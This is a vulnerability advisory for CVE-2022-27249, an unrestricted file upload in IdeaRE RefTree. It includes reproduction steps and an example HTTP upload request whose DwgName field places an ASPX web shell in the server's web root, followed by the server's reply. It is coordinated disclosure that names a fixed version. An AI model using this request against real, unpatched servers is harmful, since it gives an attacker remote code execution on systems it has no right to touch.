IdeaRE RefTree Shell Upload

`===============================================================================  
title: IdeaRE RefTree Remote Code Execution  
product: IdeaRE RefTree < 2021.09.17  
vulnerability type: Unrestricted File Upload  
CVE ID: CVE-2022-27249  
severity: High  
CVSSv3 score: 8.8  
CVSSv3 vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H  
found: 2021-09-13  
by: Savino Sisco [email protected]  
===============================================================================  
  
[EXECUTIVE SUMMARY]  
RefTree is a web application made for managing complex real estate situations.  
Among other features, it offers the possibility for authenticated users  
to upload and download DWG (CAD drawings) files for buildings.  
  
During a penetration test activity, an "Unrestricted File Upload" vulnerability  
was found which leverages the upload feature to upload a file anywhere on the   
target system.  
  
By uploading a malicious web page, like an aspx web shell, to the server's  
web root it is possible to achive code execution by just navigating to the  
malicious page with a web browser.  
  
[VULNERABLE VERSIONS]  
IdeaRE RefTree < 2021.09.17  
  
[TECHNICAL DETAILS]  
It is possible to reproduce the issue following these steps:  
1. Log into the application to get a valid session cookie  
2. Get a valid "ObjId" from the application (the ID of a building to associate  
the file to)  
3. Use the API endpoint '/CaddemServiceJS/CaddemService.svc/rest/UploadDwg'  
to upload a file on the target system, for example a web shell in the  
server's web root  
4. Navigate to the new page with a web browser to trigger code execution  
  
  
Example of the HTTP request to the Upload endpoint:  
  
POST /CaddemServiceJS/CaddemService.svc/rest/UploadDwg HTTP/2  
Host: [REDACTED]  
Cookie: ASP.NET_SessionId=b1125gke23enpul1ukeu1ouy  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0  
Accept: application/json, text/plain, */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/json  
Content-Length: 2211  
Origin: https://[REDACTED]  
Referer: https://[REDACTED]/Reftreespace/  
  
{  
"FileContent": "[BASE64_PAYLOAD]",  
"DwgName": "C:\\inetpub\\wwwroot\\webshell.aspx",  
"UploadType": "WorkingCopy",  
"ObjId": 4774726,  
"ObjType": 5,  
"UpdateState": true,  
"DwgOp": 23  
}  
  
  
HTTP/2 200 OK  
Cache-Control: private  
Content-Type: application/json; charset=utf-8  
Server: Microsoft-IIS/10.0  
Access-Control-Allow-Credentials: true  
Access-Control-Allow-Origin: [REDACTED]  
X-Powered-By: ASP.NET  
Date: Fri, 10 Sep 2021 15:00:53 GMT  
Content-Length: 24  
  
{"UploadDwgResult":null}  
  
  
[VULNERABILITY REFERENCE]  
The following CVE ID was allocated to track the vulnerabilities:  
CVE-2022-27249  
  
  
[DISCLOSURE TIMELINE]  
2021-09-13 Vulnerability disclosed to our customer and the vendor.  
Vendor acknowledged the issue.  
2021-09-17 Vendor released a fix for the software.  
2021-10-15 The vulnerability was rechecked in the newer version to confirm   
that is was indeed fixed.  
2022-03-15 Researcher requested to publicly disclose the issue; public  
coordinated disclosure.  
  
[RESOLUTION]  
Update the software to a version >= 2021.09.17  
  
Savino Sisco <[email protected]>  
https://www.linkedin.com/in/savino-sisco/  
`